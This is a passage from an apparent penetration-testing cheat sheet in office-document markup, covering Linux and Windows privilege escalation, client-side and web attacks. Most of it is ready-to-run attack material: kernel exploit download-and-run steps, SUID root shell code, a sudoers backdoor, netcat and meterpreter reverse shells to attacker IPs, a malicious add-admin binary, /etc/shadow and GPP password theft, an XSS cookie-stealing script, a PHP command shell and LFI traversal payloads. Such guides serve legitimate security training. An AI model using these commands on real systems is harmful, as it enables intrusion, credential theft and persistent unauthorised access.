text:c="4"/>[https://www.exploit-db.com/exploits/14814/](https://www.exploit-db.com/exploits/14814/)<text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="9"/>wget -O i-can-haz-modharden.c http://www.exploit-db.com/download/14814<text:line-break/><text:s text:c="9"/>$ gcc i-can-haz-modharden.c -o i-can-haz-modharden<text:line-break/><text:s text:c="9"/>$ ./i-can-haz-modharden<text:line-break/><text:s text:c="9"/>[+] launching root shell!<text:line-break/><text:s text:c="9"/># id<text:line-break/><text:s text:c="9"/>uid=0(root) gid=0(root)<text:line-break/><text:line-break/>-<text:s text:c="3"/>CVE-2010-3904 - Linux RDS Exploit - Linux Kernel &lt;= 2.6.36-rc8<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>[https://www.exploit-db.com/exploits/15285/](https://www.exploit-db.com/exploits/15285/)<text:line-break/><text:line-break/>-<text:s text:c="3"/>CVE-2012-0056 - Mempodipper - Linux Kernel 2.6.39 &lt; 3.2.2 (Gentoo / Ubuntu x86/x64)<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>[https://git.zx2c4.com/CVE-2012-0056/about/](https://git.zx2c4.com/CVE-2012-0056/about/)<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>Linux CVE 2012-0056<text:s text:c="2"/><text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="10"/>wget -O exploit.c http://www.exploit-db.com/download/18411 <text:line-break/><text:s text:c="10"/>gcc -o mempodipper exploit.c<text:s text:c="2"/><text:line-break/><text:s text:c="10"/>./mempodipper<text:line-break/><text:line-break/>-<text:s text:c="3"/>CVE-2016-5195 - Dirty Cow - Linux Privilege Escalation - Linux Kernel &lt;= 3.19.0-73.8<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>[https://dirtycow.ninja/](https://dirtycow.ninja/)<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>First existed on 2.6.22 (released in 2007) and was fixed on Oct 18, 2016<text:s text:c="2"/><text:line-break/><text:line-break/>-<text:s text:c="3"/>Run a command as a user other than root<text:s text:c="2"/><text:line-break/><text:line-break/><text:s text:c="10"/>sudo -u haxzor /usr/bin/vim /etc/apache2/sites-available/000-default.conf<text:line-break/><text:line-break/>-<text:s text:c="3"/>Add a user or change a password<text:line-break/><text:line-break/><text:s text:c="10"/>/usr/sbin/useradd -p 'openssl passwd -1 thePassword' haxzor<text:s text:c="2"/><text:line-break/><text:s text:c="10"/>echo thePassword | passwd haxzor --stdin<text:line-break/><text:line-break/>-<text:s text:c="3"/>Local Privilege Escalation Exploit in Linux<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>**SUID** (**S**et owner **U**ser **ID** up on execution)<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>Often SUID C binary files are required to spawn a shell as a<text:line-break/><text:s text:c="8"/>superuser, you can update the UID / GID and shell as required.<text:s text:c="2"/><text:line-break/><text:s text:c="10"/><text:line-break/><text:s text:c="8"/>below are some quick copy and paste examples for various<text:line-break/><text:s text:c="8"/>shells:<text:s text:c="2"/><text:line-break/><text:s text:c="5"/><text:line-break/><text:s text:c="14"/>SUID C Shell for /bin/bash<text:s text:c="2"/><text:line-break/><text:line-break/><text:s text:c="14"/>int main(void){<text:s text:c="2"/><text:line-break/><text:s text:c="14"/>setresuid(0, 0, 0);<text:s text:c="2"/><text:line-break/><text:s text:c="14"/>system("/bin/bash");<text:s text:c="2"/><text:line-break/><text:s text:c="14"/>}<text:s text:c="2"/><text:line-break/><text:line-break/><text:s text:c="14"/>SUID C Shell for /bin/sh<text:s text:c="2"/><text:line-break/><text:line-break/><text:s text:c="14"/>int main(void){<text:s text:c="2"/><text:line-break/><text:s text:c="14"/>setresuid(0, 0, 0);<text:s text:c="2"/><text:line-break/><text:s text:c="14"/>system("/bin/sh");<text:s text:c="2"/><text:line-break/><text:s text:c="14"/>}<text:s text:c="2"/><text:line-break/><text:line-break/><text:s text:c="14"/>Building the SUID Shell binary<text:s text:c="2"/><text:line-break/><text:s text:c="14"/>gcc -o suid suid.c<text:s text:c="2"/><text:line-break/><text:s text:c="14"/>For 32 bit:<text:s text:c="2"/><text:line-break/><text:s text:c="14"/>gcc -m32 -o suid suid.c<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Create and compile an SUID from a limited shell (no file transfer)<text:s text:c="2"/><text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="14"/>echo "int main(void){\nsetgid(0);\nsetuid(0);\nsystem(\"/bin/sh\");\n}" &gt;privsc.c<text:s text:c="2"/><text:line-break/><text:s text:c="14"/>gcc privsc.c -o privsc<text:line-break/><text:line-break/>-<text:s text:c="3"/>Handy command if you can get a root user to run it. Add the www-data user to Root SUDO group with no password requirement:<text:line-break/><text:line-break/><text:s text:c="4"/>`echo 'chmod 777 /etc/sudoers &amp;&amp; echo "www-data ALL=NOPASSWD:ALL" &gt;&gt; /etc/sudoers &amp;&amp; chmod 440 /etc/sudoers' &gt; /tmp/update`<text:line-break/><text:s text:c="4"/><text:line-break/>-<text:s text:c="3"/>You may find a command is being executed by the root user, you may be able to modify the system PATH environment variable<text:line-break/><text:s text:c="4"/>to execute your command instead.<text:s text:c="2"/>In the example below, ssh is replaced with a reverse shell SUID connecting to 10.10.10.1 on <text:line-break/><text:s text:c="4"/>port 4444.<text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="9"/>set PATH="/tmp:/usr/local/bin:/usr/bin:/bin"<text:line-break/><text:s text:c="9"/>echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 10.10.10.1 4444 &gt;/tmp/f" &gt;&gt; /tmp/ssh<text:line-break/><text:s text:c="9"/>chmod +x ssh<text:line-break/><text:line-break/>-<text:s text:c="3"/>SearchSploit<text:s text:c="2"/><text:line-break/><text:line-break/><text:s text:c="14"/>searchsploit –uncsearchsploit apache 2.2<text:s text:c="2"/><text:line-break/><text:s text:c="14"/>searchsploit "Linux Kernel"<text:s text:c="2"/><text:line-break/><text:s text:c="14"/>searchsploit linux 2.6 | grep -i ubuntu | grep local<text:s text:c="2"/><text:line-break/><text:s text:c="14"/>searchsploit slmail<text:line-break/><text:line-break/> -<text:s text:c="3"/>Kernel Exploit Suggestions for Kernel Version 3.0.0<text:s text:c="2"/><text:line-break/> <text:line-break/><text:s text:c="5"/>`./usr/share/linux-exploit-suggester/Linux_Exploit_Suggester.pl -k 3.0.0`<text:line-break/><text:line-break/>-<text:s text:c="3"/>Precompiled Linux Kernel Exploits<text:s text:c="2"/>- ***Super handy if GCC is not installed on the target machine!***<text:line-break/><text:line-break/><text:s text:c="4"/>[*https://www.kernel-exploits.com/*](https://www.kernel-exploits.com/)<text:s text:c="4"/><text:line-break/><text:line-break/>-<text:s text:c="3"/>Collect root password<text:line-break/><text:line-break/><text:s text:c="4"/>`cat /etc/shadow |grep root`<text:line-break/><text:s text:c="4"/><text:line-break/>-<text:s text:c="3"/>Find and display the proof.txt or flag.txt - LOOT!<text:line-break/><text:line-break/><text:s text:c="12"/>cat `find / -name proof.txt -print`<text:line-break/><text:line-break/>-<text:s text:c="3"/>Windows Privilege Escalation<text:line-break/><text:s text:c="4"/>--------------------------------------------------------------------------------------------------------------------------<text:line-break/><text:line-break/>-<text:s text:c="3"/>Windows Privilege Escalation resource<text:line-break/><text:s text:c="4"/>http://www.fuzzysecurity.com/tutorials/16.html<text:line-break/><text:line-break/>-<text:s text:c="3"/>Try the getsystem command using meterpreter - rarely works but is worth a try.<text:line-break/><text:line-break/><text:s text:c="4"/>`meterpreter &gt; getsystem`<text:line-break/><text:line-break/>-<text:s text:c="3"/>Metasploit Meterpreter Privilege Escalation Guide<text:line-break/><text:s text:c="4"/>https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/<text:line-break/><text:line-break/>-<text:s text:c="3"/>Windows Server 2003 and IIS 6.0 WEBDAV Exploiting<text:line-break/>http://www.r00tsec.com/2011/09/exploiting-microsoft-iis-version-60.html<text:line-break/><text:line-break/><text:s text:c="9"/>msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.2.3.4 LPORT=443 -f asp &gt; aspshell.txt<text:line-break/><text:line-break/><text:s text:c="9"/>cadavar http://$ip<text:line-break/><text:s text:c="9"/>dav:/&gt; put aspshell.txt<text:line-break/><text:s text:c="9"/>Uploading aspshell.txt to `/aspshell.txt':<text:line-break/><text:s text:c="9"/>Progress: [=============================&gt;] 100.0% of 38468 bytes succeeded.<text:line-break/><text:s text:c="9"/>dav:/&gt; copy aspshell.txt aspshell3.asp;.txt<text:line-break/><text:s text:c="9"/>Copying `/aspshell3.txt' to `/aspshell3.asp%3b.txt':<text:s text:c="2"/>succeeded.<text:line-break/><text:s text:c="9"/>dav:/&gt; exit<text:line-break/><text:line-break/><text:s text:c="9"/>msf &gt; use exploit/multi/handler<text:line-break/><text:s text:c="9"/>msf exploit(handler) &gt; set payload windows/meterpreter/reverse_tcp<text:line-break/><text:s text:c="9"/>msf exploit(handler) &gt; set LHOST 1.2.3.4<text:line-break/><text:s text:c="9"/>msf exploit(handler) &gt; set LPORT 80<text:line-break/><text:s text:c="9"/>msf exploit(handler) &gt; set ExitOnSession false<text:line-break/><text:s text:c="9"/>msf exploit(handler) &gt; exploit -j<text:line-break/><text:line-break/><text:s text:c="9"/>curl http://$ip/aspshell3.asp;.txt<text:line-break/><text:line-break/><text:s text:c="9"/>[*] Started reverse TCP handler on 1.2.3.4:443 <text:line-break/><text:s text:c="9"/>[*] Starting the payload handler...<text:line-break/><text:s text:c="9"/>[*] Sending stage (957487 bytes) to 1.2.3.5<text:line-break/><text:s text:c="9"/>[*] Meterpreter session 1 opened (1.2.3.4:443 -&gt; 1.2.3.5:1063) at 2017-09-25 13:10:55 -0700<text:line-break/><text:line-break/>-<text:s text:c="3"/>Windows privledge escalation exploits are often written in Python. So, it is necessary to compile the using pyinstaller.py into an executable and upload them to the remote server.<text:line-break/><text:line-break/><text:s text:c="9"/>pip install pyinstaller<text:line-break/><text:s text:c="9"/>wget -O exploit.py http://www.exploit-db.com/download/31853<text:s text:c="2"/><text:line-break/><text:s text:c="9"/>python pyinstaller.py --onefile exploit.py<text:line-break/><text:line-break/>-<text:s text:c="3"/>Windows Server 2003 and IIS 6.0 privledge escalation using impersonation: <text:line-break/><text:line-break/><text:s text:c="6"/>https://www.exploit-db.com/exploits/6705/<text:line-break/><text:s text:c="3"/><text:line-break/><text:s text:c="6"/>https://github.com/Re4son/Churrasco<text:line-break/><text:s text:c="6"/><text:line-break/><text:s text:c="9"/>c:\Inetpub&gt;churrasco<text:line-break/><text:s text:c="9"/>churrasco<text:line-break/><text:s text:c="9"/>/churrasco/--&gt;Usage: Churrasco.exe [-d] "command to run"<text:line-break/><text:line-break/><text:s text:c="9"/>c:\Inetpub&gt;churrasco -d "net user /add &lt;username&gt; &lt;password&gt;"<text:line-break/><text:s text:c="9"/>c:\Inetpub&gt;churrasco -d "net localgroup administrators &lt;username&gt; /add"<text:line-break/><text:s text:c="9"/>c:\Inetpub&gt;churrasco -d "NET LOCALGROUP "Remote Desktop Users" &lt;username&gt; /ADD"<text:line-break/><text:line-break/>-<text:s text:c="3"/>Windows MS11-080 - http://www.exploit-db.com/exploits/18176/<text:s text:c="2"/><text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="10"/>python pyinstaller.py --onefile ms11-080.py<text:s text:c="2"/><text:line-break/><text:s text:c="10"/>mx11-080.exe -O XP<text:line-break/><text:s text:c="4"/><text:line-break/>-<text:s text:c="3"/>Powershell Exploits - You may find that some Windows privledge escalation exploits are written in Powershell. You may not have an interactive shell that allows you to enter the powershell prompt.<text:s text:c="2"/>Once the powershell script is uploaded to the server, here is a quick one liner to run a powershell command from a basic (cmd.exe) shell:<text:line-break/><text:line-break/><text:s text:c="6"/>MS16-032 https://www.exploit-db.com/exploits/39719/<text:line-break/><text:s text:c="6"/><text:line-break/><text:s text:c="6"/>`powershell -ExecutionPolicy ByPass -command "&amp; { . C:\Users\Public\Invoke-MS16-032.ps1; Invoke-MS16-032 }"`<text:line-break/><text:s text:c="6"/><text:line-break/><text:s text:c="4"/><text:line-break/>-<text:s text:c="3"/>Powershell Priv Escalation Tools<text:line-break/><text:s text:c="4"/>https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc<text:line-break/><text:line-break/>-<text:s text:c="3"/>Windows Run As - Switching users in linux is trival with the `SU` command.<text:s text:c="2"/>However, an equivalent command does not exist in Windows.<text:s text:c="2"/>Here are 3 ways to run a command as a different user in Windows.<text:line-break/><text:line-break/><text:s text:c="6"/>-<text:s text:c="3"/>Sysinternals psexec is a handy tool for running a command on a remote or local server as a specific user, given you have thier username and password. The following example creates a reverse shell from a windows server to our Kali box using netcat for Windows and Psexec (on a 64 bit system).<text:line-break/><text:line-break/><text:s text:c="15"/>C:\&gt;psexec64 \\COMPUTERNAME -u Test -p test -h "c:\users\public\nc.exe -nc 192.168.1.10 4444 -e cmd.exe" <text:line-break/><text:line-break/><text:s text:c="15"/>PsExec v2.2 - Execute processes remotely<text:line-break/><text:s text:c="15"/>Copyright (C) 2001-2016 Mark Russinovich<text:line-break/><text:s text:c="15"/>Sysinternals - www.sysinternals.com<text:line-break/><text:line-break/><text:s text:c="6"/>-<text:s text:c="3"/>Runas.exe is a handy windows tool that allows you to run a program as another user so long as you know thier password. The following example creates a reverse shell from a windows server to our Kali box using netcat for Windows and Runas.exe:<text:line-break/><text:line-break/><text:s text:c="15"/>C:\&gt;C:\Windows\System32\runas.exe /env /noprofile /user:Test "c:\users\public\nc.exe -nc 192.168.1.10 4444 -e cmd.exe"<text:line-break/><text:s text:c="15"/>Enter the password for Test:<text:line-break/><text:s text:c="15"/>Attempting to start nc.exe as user "COMPUTERNAME\Test" ...<text:line-break/><text:line-break/><text:s text:c="6"/>-<text:s text:c="3"/>PowerShell can also be used to launch a process as another user. The following simple powershell script will run a reverse shell as the specified username and password.<text:line-break/><text:line-break/><text:s text:c="15"/>$username = '&lt;username here&gt;'<text:line-break/><text:s text:c="15"/>$password = '&lt;password here&gt;'<text:line-break/><text:s text:c="15"/>$securePassword = ConvertTo-SecureString $password -AsPlainText -Force<text:line-break/><text:s text:c="15"/>$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword<text:line-break/><text:s text:c="15"/>Start-Process -FilePath C:\Users\Public\nc.exe -NoNewWindow -Credential $credential -ArgumentList ("-nc","192.168.1.10","4444","-e","cmd.exe") -WorkingDirectory C:\Users\Public<text:line-break/><text:line-break/><text:s text:c="13"/>Next run this script using powershell.exe:<text:line-break/><text:line-break/><text:s text:c="13"/>`powershell -ExecutionPolicy ByPass -command "&amp; { . C:\Users\public\PowerShellRunAs.ps1; }"`<text:line-break/><text:line-break/><text:line-break/>-<text:s text:c="3"/>Windows Service Configuration Viewer - Check for misconfigurations<text:line-break/><text:s text:c="4"/>in services that can lead to privilege escalation. You can replace<text:line-break/><text:s text:c="4"/>the executable with your own and have windows execute whatever code<text:line-break/><text:s text:c="4"/>you want as the privileged user.<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>icacls scsiaccess.exe<text:line-break/><text:line-break/><text:s text:c="9"/>scsiaccess.exe<text:s text:c="2"/><text:line-break/><text:s text:c="9"/>NT AUTHORITY\SYSTEM:(I)(F)<text:s text:c="2"/><text:line-break/><text:s text:c="9"/>BUILTIN\Administrators:(I)(F)<text:s text:c="2"/><text:line-break/><text:s text:c="9"/>BUILTIN\Users:(I)(RX)<text:s text:c="2"/><text:line-break/><text:s text:c="9"/>APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)<text:s text:c="2"/><text:line-break/><text:s text:c="9"/>Everyone:(I)(F)<text:line-break/><text:line-break/>-<text:s text:c="3"/>Compile a custom add user command in windows using C<text:s text:c="2"/><text:line-break/><text:line-break/><text:s text:c="13"/>root@kali:~\# cat useradd.c<text:s text:c="2"/><text:line-break/><text:s text:c="13"/>#include &lt;stdlib.h&gt; /* system, NULL, EXIT_FAILURE */<text:s text:c="2"/><text:line-break/><text:s text:c="13"/>int main ()<text:s text:c="2"/><text:line-break/><text:s text:c="13"/>{<text:s text:c="2"/><text:line-break/><text:s text:c="13"/>int i;<text:s text:c="2"/><text:line-break/><text:s text:c="13"/>i=system ("net localgroup administrators low /add");<text:s text:c="2"/><text:line-break/><text:s text:c="13"/>return 0;<text:s text:c="2"/><text:line-break/><text:s text:c="13"/>}<text:s text:c="2"/><text:line-break/><text:line-break/><text:s text:c="13"/>i686-w64-mingw32-gcc -o scsiaccess.exe useradd.c<text:line-break/><text:line-break/>-<text:s text:c="3"/>Group Policy Preferences (GPP)<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>A common useful misconfiguration found in modern domain environments<text:line-break/><text:s text:c="4"/>is unprotected Windows GPP settings files<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>map the Domain controller SYSVOL share<text:s text:c="2"/><text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>`net use z:\\dc01\SYSVOL`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Find the GPP file: Groups.xml<text:s text:c="2"/><text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>`dir /s Groups.xml`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Review the contents for passwords<text:s text:c="2"/><text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>`type Groups.xml`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Decrypt using GPP Decrypt<text:s text:c="2"/><text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>`gpp-decrypt riBZpPtHOGtVk+SdLOmJ6xiNgFH6Gp45BoP3I6AnPgZ1IfxtgI67qqZfgh78kBZB`<text:line-break/><text:s text:c="8"/><text:line-break/>-<text:s text:c="3"/>Find and display the proof.txt or flag.txt - get the loot!<text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="4"/>`#meterpreter<text:s text:c="2"/>&gt;<text:s text:c="5"/>run<text:s text:c="2"/>post/windows/gather/win_privs`<text:line-break/><text:s text:c="4"/>`cd\ &amp; dir /b /s proof.txt`<text:line-break/><text:s text:c="4"/>`type c:\pathto\proof.txt`<text:line-break/><text:s text:c="4"/><text:line-break/><text:line-break/>Client, Web and Password Attacks<text:line-break/>==============================================================================================================================<text:line-break/><text:line-break/>-<text:s text:c="3"/>&lt;span id="_pcjm0n4oppqx" class="anchor"&gt;&lt;span id="_Toc480741817" class="anchor"&gt;&lt;/span&gt;&lt;/span&gt;Client Attacks<text:line-break/><text:s text:c="4"/>------------------------------------------------------------------------------------------------------------<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>MS12-037- Internet Explorer 8 Fixed Col Span ID<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>wget -O exploit.html<text:line-break/><text:s text:c="8"/>&lt;http://www.exploit-db.com/download/24017&gt;<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>service apache2 start<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>JAVA Signed Jar client side attack<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>echo '&lt;applet width="1" height="1" id="Java Secure"<text:line-break/><text:s text:c="8"/>code="Java.class" archive="SignedJava.jar"&gt;&lt;param name="1"<text:line-break/><text:s text:c="8"/>value="http://$ip:80/evil.exe"&gt;&lt;/applet&gt;' &gt;<text:line-break/><text:s text:c="8"/>/var/www/html/java.html<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>User must hit run on the popup that occurs.<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Linux Client Shells<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>[*http://www.lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/*](http://www.lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/)<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Setting up the Client Side Exploit<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Swapping Out the Shellcode<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Injecting a Backdoor Shell into Plink.exe<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>backdoor-factory -f /usr/share/windows-binaries/plink.exe -H $ip<text:line-break/><text:s text:c="8"/>-P 4444 -s reverse\_shell\_tcp<text:line-break/><text:line-break/>-<text:s text:c="3"/>&lt;span id="_n6fr3j21cp1m" class="anchor"&gt;&lt;span id="_Toc480741818" class="anchor"&gt;&lt;/span&gt;&lt;/span&gt;Web Attacks<text:line-break/><text:s text:c="4"/>---------------------------------------------------------------------------------------------------------<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Web Shag Web Application Vulnerability Assessment Platform<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>webshag-gui<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Web Shells<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>[*http://tools.kali.org/maintaining-access/webshells*](http://tools.kali.org/maintaining-access/webshells)<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>ls -l /usr/share/webshells/<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Generate a PHP backdoor (generate) protected with the given<text:line-break/><text:s text:c="8"/>password (s3cr3t)<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>weevely generate s3cr3t<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>weevely http://$ip/weevely.php s3cr3t<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Java Signed Applet Attack<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>HTTP / HTTPS Webserver Enumeration<text:line-break/><text:line-break/><text:s text:c="8"/>-<text:s text:c="3"/>OWASP Dirbuster<text:line-break/><text:line-break/><text:s text:c="8"/>-<text:s text:c="3"/>nikto -h $ip<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Essential Iceweasel Add-ons<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>Cookies Manager<text:line-break/><text:s text:c="8"/>https://addons.mozilla.org/en-US/firefox/addon/cookies-manager-plus/<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>Tamper Data<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>https://addons.mozilla.org/en-US/firefox/addon/tamper-data/<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Cross Site Scripting (XSS)<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>significant impacts, such as cookie stealing and authentication<text:line-break/><text:s text:c="8"/>bypass, redirecting the victim’s browser to a malicious HTML<text:line-break/><text:s text:c="8"/>page, and more<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Browser Redirection and IFRAME Injection<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>&lt;iframe SRC="http://$ip/report" height = "0" width<text:line-break/><text:s text:c="8"/>="0"&gt;&lt;/iframe&gt;<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Stealing Cookies and Session Information<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>&lt;script&gt;<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>new<text:line-break/><text:s text:c="8"/>image().src="http://$ip/bogus.php?output="+document.cookie;<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>&lt;/script&gt;<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>nc -nlvp 80<text:line-break/><text:line-break/>-<text:s text:c="3"/>File Inclusion Vulnerabilities <text:line-break/><text:s text:c="4"/>-----------------------------------------------------------------------------------------------------------------------------<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Local (LFI) and remote (RFI) file inclusion vulnerabilities are<text:line-break/><text:s text:c="8"/>commonly found in poorly written PHP code.<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>fimap - There is a Python tool called fimap which can be<text:line-break/><text:s text:c="8"/>leveraged to automate the exploitation of LFI/RFI<text:line-break/><text:s text:c="8"/>vulnerabilities that are found in PHP (sqlmap for LFI):<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>[*https://github.com/kurobeats/fimap*](https://github.com/kurobeats/fimap)<text:line-break/><text:line-break/><text:s text:c="8"/>-<text:s text:c="3"/>Gaining a shell from phpinfo()<text:s text:c="2"/><text:line-break/><text:s text:c="12"/>fimap + phpinfo() Exploit - If a phpinfo() file is present,<text:line-break/><text:s text:c="12"/>it’s usually possible to get a shell, if you don’t know the<text:line-break/><text:s text:c="12"/>location of the phpinfo file fimap can probe for it, or you<text:line-break/><text:s text:c="12"/>could use a tool like OWASP DirBuster.<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>For Local File Inclusions look for the include() function in PHP<text:line-break/><text:s text:c="8"/>code.<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>include("lang/".$\_COOKIE\['lang'\]);<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>include($\_GET\['page'\].".php");<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>LFI - Encode and Decode a file using base64<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>curl -s<text:line-break/><text:s text:c="8"/>http://$ip/?page=php://filter/convert.base64-encode/resource=index<text:line-break/><text:s text:c="8"/>| grep -e '\[^\\ \]\\{40,\\}' | base64 -d<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>LFI - Download file with base 64 encoding<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>[*http://$ip/index.php?page=php://filter/convert.base64-encode/resource=admin.php*](about:blank)<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>LFI Linux Files:<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>/etc/issue<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>/proc/version<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>/etc/profile<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>/etc/passwd<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>/etc/passwd<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>/etc/shadow<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>/root/.bash\_history<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>/var/log/dmessage<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>/var/mail/root<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>/var/spool/cron/crontabs/root<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>LFI Windows Files:<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>%SYSTEMROOT%\\repair\\system<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>%SYSTEMROOT%\\repair\\SAM<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>%SYSTEMROOT%\\repair\\SAM<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>%WINDIR%\\win.ini<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>%SYSTEMDRIVE%\\boot.ini<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>%WINDIR%\\Panther\\sysprep.inf<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>%WINDIR%\\system32\\config\\AppEvent.Evt<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>LFI OSX Files:<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>/etc/fstab<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>/etc/master.passwd<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>/etc/resolv.conf<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>/etc/sudoers<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>/etc/sysctl.conf<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>LFI - Download passwords file<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>[*http://$ip/index.php?page=/etc/passwd*](about:blank)<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>[*http://$ip/index.php?file=../../../../etc/passwd*](about:blank)<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>LFI - Download passwords file with filter evasion<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>[*http://$ip/index.php?file=..%2F..%2F..%2F..%2Fetc%2Fpasswd*](about:blank)<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Local File Inclusion - In versions of PHP below 5.3 we can<text:line-break/><text:s text:c="8"/>terminate with null byte<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>GET<text:line-break/><text:s text:c="8"/>/addguestbook.php?name=Haxor&amp;comment=Merci!&amp;LANG=../../../../../../../windows/system32/drivers/etc/hosts%00<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Contaminating Log Files `&lt;?php echo shell_exec($_GET['cmd']);?&gt;`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>For a Remote File Inclusion look for php code that is not<text:s text:c="2"/>sanitized and passed to the PHP include function and the php.ini<text:line-break/><text:s text:c="8"/>file must be configured to allow remote files<text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>*/etc/php5/cgi/php.ini* - "allow_url_fopen" and "allow_url_include" both set to "on"<text:s text:c="2"/><text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>`include($_REQUEST["file"].".php");`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Remote File Inclusion<text:s text:c="2"/><text:line-break/><text:s 